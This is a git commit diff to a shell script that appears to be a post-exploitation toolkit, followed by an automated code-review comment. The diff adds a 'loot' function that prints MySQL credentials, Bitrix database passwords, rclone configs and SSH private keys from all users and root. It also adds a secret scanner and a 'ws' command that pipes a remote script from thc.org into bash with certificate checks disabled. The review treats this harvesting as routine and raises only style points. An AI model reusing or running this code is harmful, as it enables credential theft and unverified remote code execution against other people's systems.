
Commit 2d008ce

committed
loot
1 parent 66b267a commit 2d008ce


1 file changed

+104
-11
lines changed


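--- a/tools/hackshell.sh
+++ b/tools/hackshell.sh
@@ -282,6 +282,7 @@ hs_mkhome() {
 
 # Keep this seperate because this actually creates data.
 mk() {
+UHOME="${HOME}"
 export HOME="${XHOME}"
 echo -e "${CDM}HOME set to ${CDY}${XHOME}${CN}"
 echo -e "Undo with ${CDC}export HOME='${_HS_HOME_ORIG}'${CN}"
@@ -293,6 +294,16 @@ keep() {
 HS_INFO "Wont delete ${CDY}${XHOME}${CDM} on exit"
 }
 
+np() {
+command -v noseyparker >/dev/null || { HS_ERR "Not found: noseyparker. Type ${CDC}bin${CN} first."; return 255;}
+local d="/tmp/.np-${UID}-$$"
+[ -d "${d}" ] && rm -rf "${d:?}"
+[ $# -le 0 ] && set - .
+NP_DATASTORE="$d" noseyparker -q scan "$1" >&2 || return
+NP_DATASTORE="$d" noseyparker report --color=always
+rm -rf "${d:?}"
+}
+
 bin() {
 local arch="$(uname -m)"
 local os="$(uname -s)"
@@ -308,11 +319,14 @@ bin() {
 bin_dl() {
 local dst="${XHOME}/${1:?}"
 local str="${CDM}Downloading ${CDC}${1:?}${CDM}........................................"
+local is_skip
 echo -en "${str:0:64}"
 [ -s "${dst}" ] || rm -f "${dst:?}" 2>/dev/null
-command -v "${1}" >/dev/null && { echo -e "[${CDY}SKIPPED${CDM}]${CN}"; return 0; }
-{ err=$(dl "${2:?}" 2>&1 >&3 3>&-); } >"${XHOME}/${1:?}" 3>&1 || { echo -e ".[${CR}FAILED${CDM}]${CN}${CF}\n---> ${2}\n---> ${err}${CN}"; return 255; }
-chmod 711 "${XHOME}/${1}"
+[ -z "$FORCE" ] && command -v "${1}" >/dev/null && is_skip=1
+[ -n "$FORCE" ] && [ -s "$dst" ] && is_skip=1
+[ -n "$is_skip" ] && { echo -e "[${CDY}SKIPPED${CDM}]${CN}"; return 0; }
+{ err=$(dl "${2:?}" 2>&1 >&3 3>&-); } >"${dst}" 3>&1 || { echo -e ".[${CR}FAILED${CDM}]${CN}${CF}\n---> ${2}\n---> ${err}${CN}"; return 255; }
+chmod 711 "${dst}"
 echo -e ".....[${CDG}OK${CDM}]${CN}"
 }
 
@@ -336,14 +350,93 @@ bin() {
 bin_dl zgrep "https://bin.ajam.dev/${a}/Baseutils/zgrep"
 bin_dl grep "https://bin.ajam.dev/${a}/Baseutils/grep"
 bin_dl tar "https://bin.ajam.dev/${a}/Baseutils/tar"
+bin_dl sed "https://bin.ajam.dev/${a}/Baseutils/secd"
 bin_dl nmap "https://bin.ajam.dev/${a}/nmap"
 bin_dl tcpdump "https://bin.ajam.dev/${a}/tcpdump"
+[ "$arch" = "x86_64" ] && bin_dl noseyparker "https://github.com/hackerschoice/binary/raw/main/tools/noseyparker-x86_64-static"
 
-echo -e ">>> ${CDG}Download COMPLETED${CN}"
+[ -z "$FORCE" ] && echo -e ">>> Use ${CDC}FORCE=1 bin${CN} to force download even if systemwide exists"
+echo -e ">>> ${CDG}Download COMPLETE${CN}"
 
 unset -f bin_dl
 }
 
+loot_sshkey() {
+local str="${CF}password protected"
+local fn="${1:?}"
+
+[ ! -s "${fn}" ] && return
+grep -Fqam1 'PRIVATE KEY' "${fn}" || return
+
+setsid -w ssh-keygen -y -f "${fn}" </dev/null &>/dev/null && str="${CDR}NO PASSWORD"
+echo -e "${CB}SSH Key ${CDY}${fn}${CN} ${str}${CDY}${CF}"
+cat "$fn"
+echo -en "${CN}"
+}
+
+loot_bitrix() {
+local fn="${1:?}"
+[ ! -f "$fn" ] && return
+grep -Fqam1 '$_ENV[' "$fn" && return
+echo -e "${CB}Bitrix DB ${CDY}${fn}${CF}"
+grep --color=never -E "(host|database|login|password)'.*=" "${fn}"
+echo -en "${CN}"
+}
+
+loot() {
+local h="${UHOME:-$HOME}"
+local str
+
+for fn in "${HOMEDIR:-/home}"/*/.my.cnf /root/.my.cnf; do
+[ ! -s "$fn" ] && continue
+echo -e "${CB}MySQL ${CDY}${fn}${CF}"
+grep -vE "^(#|\[)" <"${fn}"
+echo -en "${CN}"
+# grep -E "^(user|password)" "${h}/.my"
+done
+for fn in "${HOMEDIR:-/home}"/*/.mysql_history /root/.mysql_history; do
+[ ! -s "$fn" ] && continue
+str=$(grep -ia '^SET PASSWORD FOR' "$fn") || continue
+echo -e "${CB}MySQL ${CDY}${fn}${CF}"
+echo "$str"
+echo -en "${CN}"
+done
+
+### Bitrix
+for fn in "${HOMEDIR:-/home}"/*/*/bitrix/.settings.php; do
+loot_bitrix "$fn"
+done
+
+find /var/www -maxdepth 6 -type f -wholename "*/bitrix/.settings.php" | while read -r fn; do
+loot_bitrix "$fn"
+done
+
+### SSH Keys
+[ -e "/etc/ansible/ansible.cfg" ] && {
+str="$(grep ^private_key_file "/etc/ansible/ansible.cfg")"
+s="${str##*= }"
+loot_sshkey "$s"
+}
+
+for fn in "${HOMEDIR:-/home}"/*/.ssh/* /root/.ssh/*; do
+loot_sshkey "$fn"
+done
+
+### .config
+for fn in "${HOMEDIR:-/home}"/*/.config/rclone/rclone.conf /root/.config/rclone/rclone.conf; do
+[ ! -s "$fn" ] && continue
+echo -e "${CB}rclone ${CDY}${fn}${CF}"
+cat "$fn"
+echo -en "${CN}"
+done
+
+HS_WARN "FIXME: This is ALPHA. Needs much more..."
+}
+
+ws() {
+dl https://thc.org/ws | bash
+}
+
 hs_exit() {
 cd /tmp || cd /dev/shm || cd /
 [ "${#_hs_bounce_src[@]}" -gt 0 ] && HS_WARN "Bounce still set in iptables. Type ${CDC}unbounce${CN} to stop the forward."
@@ -361,21 +454,18 @@ hs_exit() {
 
 [ -z "$BASH" ] && TRAPEXIT() { hs_exit; } #zsh
 
+### Functions (temporary)
 hs_init_dl() {
+# Ignore TLS certificate. This is DANGEROUS but many hosts have missing ca-bundles or TLS-Proxies.
 if command -v curl >/dev/null; then
-dl() {
-curl -fsSLk --proto-default https --connect-timeout 7 --retry 3 "${1:?}"
-}
+dl() { curl -fsSLk --proto-default https --connect-timeout 7 --retry 3 "${1:?}";}
 elif command -v wget >/dev/null; then
 dl() { wget -Op --no-check-certificate --connect-timeout=7 --dns-timeout=7 "${1:?}";}
 else
-dl() {
-HS_ERR "Not found: curl"
-}
+dl() { HS_ERR "Not found: curl"; }
 fi
 }
 
-### Functions (temporary)
 hs_init() {
 local a
 local prg="$1"
@@ -458,6 +548,9 @@ ${CDC} find_subdomain .foobar.com ${CDM}Search files for sub-domain
 ${CDC} crt foobar.com ${CDM}Query crt.sh for all sub-domains
 ${CDC} rdns 1.2.3.4 ${CDM}Reverse DNS from multiple public databases
 ${CDC} hide <pid> ${CDM}Hide a process
+${CDC} np <directory> ${CDM}Display secrets with NoseyParker ${CN}${CF}[try |less -R]
+${CDC} loot ${CDM}Display common secrets
+${CDC} ws ${CDM}WhatServer - display server's essentials
 ${CDC} bin ${CDM}Download useful static binaries
 ${CDC} xhelp ${CDM}This help"
 echo -e "${CN}"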
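Review bot: In the new `loot()` (hunk `@@ -336,14 +350,93 @@`) the loop variable `fn` and the `s` assigned from the ansible config are never declared `local`, so in this sourced, interactive script they leak into the caller's shell as globals, while the declared `local h` is only referenced from a commented-out line; `local str fn s` and dropping `h` would fix both. The same `fn`-without-`local` pattern appears in the `for`/`while` loops throughout the function, so one declaration at the top covers them all. Separately, `ws()` pipes the output of `dl` straight into `bash`, and the commit's own comment in `hs_init_dl()` notes that `dl` runs curl/wget with certificate verification disabled — so nothing checks what gets executed; at minimum a comment on `ws()` should state that it executes an unverified remote script so a reader does not mistake it for a local helper. The `set - .` in `np()` is also the unusual spelling of `set -- .`; it works but additionally clears `-x`/`-v`, which a reader may not expect.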
